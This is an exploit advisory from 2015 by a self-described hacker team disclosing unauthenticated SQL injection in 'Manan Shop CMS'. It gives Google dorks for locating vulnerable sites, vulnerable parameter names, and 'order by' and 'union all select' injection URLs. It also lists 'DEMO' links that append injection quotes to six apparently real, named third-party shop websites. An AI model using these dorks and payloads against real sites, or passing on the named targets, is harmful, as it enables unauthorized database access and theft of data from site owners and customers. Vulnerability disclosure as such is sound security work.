========================================================= [+] Title :- Manan Shop CMS - SQL Injection Vulnerability [+] Date :- 4 - July - 2015 [+] Vendor Homepage :- http://www.manan.asia/ [+] Version :- All Versions [+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows [+] Category :- webapps [+] Google Dorks :- "Designed & Developed by Manan" "Designed & Developed by Manan" "php?cat=" "Designed & Developed by Manan" +inurl:/.php?itemid= [+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN) [+] Team name :- Team Alastor Breeze, Intelligent-Exploit [+] Official Website :- serverfarming.com, intelligentexploit.com [+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k [+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha, DK [+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com ========================================================= [+] Severity Level :- High [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- itemid, numberofitems, catname, cat [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error [+] SQL vulnerable File :- /home1/outboxi1/public_html/DOMAIN.com/products_view.php [+] POC :- http://127.0.0.1/index.php?id=[SQL]' The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction. PoC: http://www.[WEBSITE].com/index.php?cat=1&catname=Women&subcat=all&numberofitems=-9' order by [SQL INJECTION]--+ http://www.[WEBSITE].com/index.php?cat=1&catname=Women&subcat=all&numberofitems=-9' union all select [SQL INJECTION]--+ [+] DEMO :- http://www.etalage-id.com/index.php?cat=1&catname=Women&subcat=all&numberofitems=9%27 http://www.chloeprincess.com/index.php?cat=1&catname=Latest%20Collection&subcat=4&subcatname=ALL&itemid=2014%27 http://www.coralicekids.com/index.php?cat=100&catname=NewArrival&subcat=&subcatname=&itemid=2267%27 http://www.kamiidea.com/index.php?cat=7&catname=Accessories&subcat=32&subcatname=Shoes%27 http://www.loewyshop.com/index.php?cat=101&catname=Sale&subcat=all&subcatname=&itemid=46%27 http://www.outboxidea.com/ribbonshopstore.com/index.php?cat=100&catname=Bags&subcat=&subcatname=&itemid=464%27 =======================================================